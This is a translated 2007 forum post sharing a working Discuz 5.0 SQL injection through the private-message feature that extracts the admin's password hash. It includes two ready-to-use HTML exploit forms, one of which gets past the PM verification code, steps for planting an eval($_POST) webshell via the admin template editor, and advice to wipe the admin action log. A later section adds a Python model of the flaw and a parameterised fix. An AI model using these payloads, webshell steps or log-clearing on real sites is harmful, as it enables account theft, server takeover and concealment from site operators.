Title: Discuz 5.0 0day + PM short-message bypass method
Posted by: 什么是么什 (Rank 1, Newbie; 83 posts; expert points 0; registered 2007-4-11)

SQL:
0) union select password,2,0 from cdb_members where uid=1/*
In uid=1/*, the 1 is the ID value.

Once you have the admin's md5 password,
go into the admin panel:
Forum management -> Module editing -> Details
Edit wap.php and insert
eval($_POST[tlwbw])
Connect to
site URL + /templates/default/wap.lang.php

Haha, after you've been through the admin panel, don't forget to clear forumdata/cplog.php

Exploit code, save as .html
The quoted snippet follows:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Dz5.0 0day</TITLE>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META content="MSHTML 6.00.3790.2858" name=GENERATOR></HEAD>
<BODY>
<STYLE>BODY {
SCROLLBAR-FACE-COLOR: #e4e4f3; FONT-SIZE: 9pt; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #e4e4f3; COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #e4e4f3; SCROLLBAR-ARROW-COLOR: #4444b3; SCROLLBAR-TRACK-COLOR: #efefef; FONT-FAMILY: "Courier New"; SCROLLBAR-DARKSHADOW-COLOR: #9c9cd3
}
TABLE {
BORDER-RIGHT: #d8d8f0 1px; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse
}
.tr {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3; TEXT-ALIGN: center
}
.td {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
.warningColor {
FONT-SIZE: 9pt; COLOR: #ff0000; FONT-FAMILY: "Courier New"
}
INPUT {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
TEXTAREA {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
A:link {
FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none
}
TR {
FONT-SIZE: 9pt; LINE-HEIGHT: 18px; FONT-FAMILY: "Courier New"
}
TD {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"
}
.trHead {
FONT-SIZE: 9pt; LINE-HEIGHT: 3px; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3
}
.inputLogin {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; VERTICAL-ALIGN: bottom; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
</STYLE>


<!-- The form below is the posted exploit; the comments describe what each field carries. -->
<TABLE cellSpacing=0 cellPadding=0 width=760 align=center border=0>
<FORM method="post">
<TBODY>
<TR>
<TD class=td height=22>&nbsp;Dz5.0 Exp</TD></TR>
<TR>
<TD class=trHead>&nbsp;</TD></TR>
<TR>
<TD class=td height=18>&nbsp;&nbsp;Url: <!-- forum base URL without a trailing slash; the submit handler appends /pm.php?action=send&pmsubmit=yes -->
<INPUT id="theAction" name="theAction" size="50" value="http://www.4evil.org"><BR>
&nbsp;Hash: <!-- the target forum's current formhash, copied from any form on that site -->
<INPUT name="formhash" value="0094b488">
&nbsp;&nbsp;&nbsp;Msgto: <!-- a username that exists on the target so the PM is accepted -->
<INPUT size="10" name="msgto" value="aspxp"><BR>
<INPUT type="hidden" size="10" name="subject" value="aa">
<INPUT type="hidden" name="message" value="aa">
&nbsp;&nbsp;SQL: <!-- the injection is carried in msgtobuddys[]; uid=1 is the admin's member id -->
<INPUT size="100" name="msgtobuddys[]"
value="0) union select password,2,0 from cdb_members where uid=1/*"></TD></TR>
<TR>
<TD class=td align=middle><INPUT type="submit" value=" Enter " name="Submit"
onclick="this.form.action=this.form.theAction.value+'/pm.php?action=send&amp;pmsubmit=yes';"><INPUT type="reset" value=" Reset " name="Submit32"></TD></TR>
<TR>
<TD class=trHead>&nbsp;</TD></TR>
<TR>
<TD class=td align=right height=22>Just For Fun <A title="QQ:****"
href="http://www.****.org">****</A>
2007.3&nbsp;</TD></TR></FORM></TBODY></TABLE></BODY></HTML>

How to get past the PM verification code with the PM vulnerability: (source: 7贱's blog)

<HTML><HEAD><TITLE>discuz</TITLE></HEAD>
<BODY>
<a href="http://1v1.name">http://1v1.name</a>
<!-- Url must end with a trailing slash: the handler appends pm.php?action=send to it directly -->
<FORM name="frm" method="post" target="_blank">Url: <INPUT size="45" name="act">&nbsp;<INPUT size="8" name="formhash">&nbsp;
<INPUT type="button" value="Submit" name="Send"
onclick="document.frm.action=document.frm.act.value+'pm.php?action=send';document.frm.submit();"><br><br>
MySQL:<INPUT size="65" name="msgtobuddys[]" value="0) union select password,2,0 from cdb_members where uid=1/*">
<!-- seccodeverify is the PM verification-code field, typed in by hand; note this variant sends pmsubmit=2 instead of pmsubmit=yes -->
<input type="text" name="seccodeverify" size="7">
<INPUT type="hidden" name="pmsubmit" value="2">
<input type="hidden" name="subject" value="test">
<input type="hidden" name="message" value="test">
</FORM>
</BODY></HTML>

2007-04-27 23:57
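The post shows the payload but not the query it lands in. The following is an added example, not code from the post and not Discuz's own code: it models the injection point with an in-memory SQLite table, assuming (the real Discuz 5.0 query is not on the page) that each msgtobuddys[] value is spliced into an IN (...) list of a three-column SELECT whose results are echoed back to the sender, which is why the payload closes the parenthesis, UNIONs in password,2,0 and comments out the rest. The sample members and hashes are constructed. The hardened version is the intval-and-bind fix a reviewer would expect.

```python
"""
Added illustration of the msgtobuddys[] injection described in the post.
Not Discuz code: the column layout (username, uid, flag) and the IN (...)
shape are assumptions chosen so that the post's payload lines up with them.
"""
import sqlite3

# the exact string from the post's SQL field
PAYLOAD = "0) union select password,2,0 from cdb_members where uid=1/*"


def make_db():
    # constructed sample data: uid=1 is the admin, uid=2 an ordinary member
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE cdb_members (uid INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO cdb_members VALUES (?,?,?)",
        [
            (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),   # md5('password'), constructed
            (2, "jackal", "098f6bcd4621d378cae4d6c9c0b6d3e3"),  # constructed hash
        ],
    )
    return con


def lookup_buddies_vulnerable(con, buddies):
    """The bug: user-controlled strings are joined straight into the SQL text.

    With the post's payload the statement becomes
      SELECT username, uid, 0 FROM cdb_members WHERE uid IN (0)
      union select password,2,0 from cdb_members where uid=1/*)
    so the admin's hash comes back in the username column.
    """
    id_list = ",".join(buddies)
    sql = f"SELECT username, uid, 0 FROM cdb_members WHERE uid IN ({id_list})"
    return con.execute(sql).fetchall()


def lookup_buddies_fixed(con, buddies):
    """Hardened lookup: coerce every id to an integer, then bind it."""
    ids = []
    for b in buddies:
        try:
            ids.append(int(b))          # the intval() step; rejects "0) union ..."
        except ValueError:
            raise ValueError(f"rejected non-numeric buddy id: {b!r}")
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT username, uid, 0 FROM cdb_members WHERE uid IN ({placeholders})"
    return con.execute(sql, ids).fetchall()   # values travel as parameters, never as SQL


def is_rejected(con, buddies):
    # does the hardened lookup refuse this input?
    try:
        lookup_buddies_fixed(con, buddies)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_buddies_vulnerable(db, [PAYLOAD]))
    print("fixed     :", lookup_buddies_fixed(db, ["2"]))
    print("rejected  :", is_rejected(db, [PAYLOAD]))
```

Running it shows the vulnerable lookup returning the admin's hash where a username belongs, while the hardened lookup refuses the payload before any SQL is built; on a real MySQL backend the same principle applies, and the trailing /* in the payload is there to swallow whatever the original query appends after the IN list.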
Reply by: PcrazyC (Rank 6, VIP; prestige 29; 5652 posts; expert points 0; registered 2006-10-20)

I don't quite follow this.


The wild goose means to leave no trace; the water has no mind to keep a reflection.
2007-04-30 23:36
编程中国 (BCCN). All rights reserved. Powered by Discuz.
Copyright © 2004-2024, BCCN.NET, All Rights Reserved